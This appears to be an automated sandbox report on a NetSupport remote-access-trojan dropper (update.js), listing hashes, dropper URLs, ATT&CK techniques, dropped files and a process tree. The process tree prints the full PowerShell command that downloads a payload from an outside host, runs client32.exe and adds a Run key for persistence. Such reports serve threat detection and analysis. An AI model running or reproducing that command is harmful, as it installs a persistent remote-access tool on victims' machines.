netsupport | 7fb1dd26be3d45f206ab802749b11463ba79e2aee8d5d9a028e81dfb0d53f0df

Analysis

max time kernel
1195s
max time network
1203s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
01-03-2024 20:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.js
Size

223KB
MD5

c55219a14b92acc6c766797f0018bdc8
SHA1

23af1095d89a469d63a65ecc9747b7bd22eb275a
SHA256

7fb1dd26be3d45f206ab802749b11463ba79e2aee8d5d9a028e81dfb0d53f0df
SHA512

03690cf44933c53b18e106362d4e4927be3462266c6cdf8cb81fbf79c7676a0e9259ea4c4fdc6d070d41fdf8cd7a70e6ecec5483352632030f1929a196180819
SSDEEP

6144:GVfTMYcAQY6//7tSoXlVoYPg5VfTMYcAQY6//7tSoXlVoYPgq:V77tS0VoYPgs77tS0VoYPgq

Score

10^/10

netsupport persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://aljannatquranteach.com/data.php?5210

exe.dropper

https://aljannatquranteach.com/data.php?5210

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	1792	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
3508	client32.exe

Loads dropped DLL 5 IoCs

pid	Process
3508	client32.exe
3508	client32.exe
3508	client32.exe
3508	client32.exe
3508	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OFFICEC = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX4\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1792	powershell.exe
1792	powershell.exe
1792	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeSecurityPrivilege	3508	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3508	client32.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 5028 wrote to memory of 1792	5028	wscript.exe	97
PID 5028 wrote to memory of 1792	5028	wscript.exe	97
PID 1792 wrote to memory of 3508	1792	powershell.exe	102
PID 1792 wrote to memory of 3508	1792	powershell.exe	102
PID 1792 wrote to memory of 3508	1792	powershell.exe	102

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\update.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $iEdodNSVJILDlwmZrbIwicNpjcYNNhF='https://aljannatquranteach.com/data.php?5210';$VRcBCBXQjTlYp=(New-Object System.Net.WebClient).DownloadString($iEdodNSVJILDlwmZrbIwicNpjcYNNhF);$jINgHFetyQPCmJdiGqqaHLHURyeiCBx=[System.Convert]::FromBase64String($VRcBCBXQjTlYp);$zxc = Get-Random -Minimum -10 -Maximum 37; $HatyWkugBZcSdjDiUQOPdzcCdLjwiXqWj=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $HatyWkugBZcSdjDiUQOPdzcCdLjwiXqWj -PathType Container)) { New-Item -Path $HatyWkugBZcSdjDiUQOPdzcCdLjwiXqWj -ItemType Directory };$p=Join-Path $HatyWkugBZcSdjDiUQOPdzcCdLjwiXqWj 'WWW.zip';[System.IO.File]::WriteAllBytes($p,$jINgHFetyQPCmJdiGqqaHLHURyeiCBx);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$HatyWkugBZcSdjDiUQOPdzcCdLjwiXqWj)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $HatyWkugBZcSdjDiUQOPdzcCdLjwiXqWj 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else { Write-Host 'No exe.'};$AZ=Get-Item $HatyWkugBZcSdjDiUQOPdzcCdLjwiXqWj -Force; $AZ.attributes='Hidden';$s=$HatyWkugBZcSdjDiUQOPdzcCdLjwiXqWj+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Users\Admin\AppData\Roaming\DIVX4\client32.exe
    "C:\Users\Admin\AppData\Roaming\DIVX4\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:3508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4036 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
1⤵
PID:1264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1036 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
1⤵
PID:752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tbgh15n2.wa2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\MSVCR100.dll

Filesize
152KB

MD5
6fb61702cfc2f94bbb2fddb90493af31

SHA1
9243094b241e06041a76c234d358570c4d74e21c

SHA256
c899a7b7aaa645876cdcef27c5969a726f656a722f3c0aec396d6105a084bcb6

SHA512
8ab40ffb199916bfe528f4be73c1c8be336af25b0eb2a40e9d4ebf0c9a5d77c47ea0e00b9b47f711d8e34dcb9781344a59979d0fab6ad2b79ba2416a0d12cf08

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\NSM.LIC

Filesize
258B

MD5
1b41e64c60ca9dfadeb063cd822ab089

SHA1
abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

SHA256
f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

SHA512
c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\PCICL32.DLL

Filesize
704KB

MD5
88c4a2bb421b0d24a14f6e732aef5501

SHA1
fab557b9644fde13173db6431890a3f39957dd3f

SHA256
60857bdf508b1a25d3eac34837de643608c9af8e22d116f315a1a834b849d437

SHA512
e11140d928e89a3d12f142a097e407e61748eab51640199c1303cb4b58dd5c4ea8530ce7c6cc279ecb6d02c835b621c3a1164a2b43ad2d74724d2ebecfc19fa2

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\PCICL32.dll

Filesize
1.8MB

MD5
1563a927b78903d60b00100f04f8541f

SHA1
db3a40fbc79eaa74e772f7ac898e02cc73b455c5

SHA256
6e806f6362008b78b3913a34fb6949b8594ffe19790bd5a9b500e7c0833d2fcf

SHA512
78606a4de0953f9843c38ce2779911b308d58f2439b1697fda397c8b8972c9a6f418406ef1fcaa4478fca490a616610b413aff6118bdb83660e08fb5d17b56ca

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\client32.ini

Filesize
701B

MD5
98043670d8c850e878e333312fcfa25a

SHA1
dc795e8b906d70ee5854a6797e0c1557375bc443

SHA256
0e7679bf30f5278850e4ff560975cce34d125e04463290ca8c0bf7065da3eecc

SHA512
13295bcf155a8dbc0afaa44dd746801e8087a3f3436c43b2879dbd1f7895faed122f06235814be887d6e305bf181135fc07b6beebf3ea30435282050ac88f201

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\msvcr100.dll

Filesize
160KB

MD5
67cf50602c7e5711bab61ce719bf23b2

SHA1
11080c7534d76ac5b7037e713c13802c5c0d4576

SHA256
0a7c6cbc5cee8738909e521e67c0a44cb4abe8123f915d3a591bdf8e7f0e6c4c

SHA512
c988f1085002dff0de44c95e5bd10be765c951a88534ff5bc1092785b2d081d17e87857f503edd6b1fef46f76c6924186aba057c287ab6b08271f16fa8f2bd3d

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX4\pcichek.dll

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
memory/1792-79-0x00007FF9D5100000-0x00007FF9D5BC1000-memory.dmp

Filesize
10.8MB

Download
memory/1792-0-0x0000014168810000-0x0000014168832000-memory.dmp

Filesize
136KB

Download
memory/1792-16-0x0000014168D30000-0x0000014168D42000-memory.dmp

Filesize
72KB

Download
memory/1792-15-0x0000014168D00000-0x0000014168D0A000-memory.dmp

Filesize
40KB

Download
memory/1792-13-0x0000014168760000-0x0000014168770000-memory.dmp

Filesize
64KB

Download
memory/1792-11-0x0000014168760000-0x0000014168770000-memory.dmp

Filesize
64KB

Download
memory/1792-12-0x0000014168760000-0x0000014168770000-memory.dmp

Filesize
64KB

Download
memory/1792-10-0x00007FF9D5100000-0x00007FF9D5BC1000-memory.dmp

Filesize
10.8MB

Download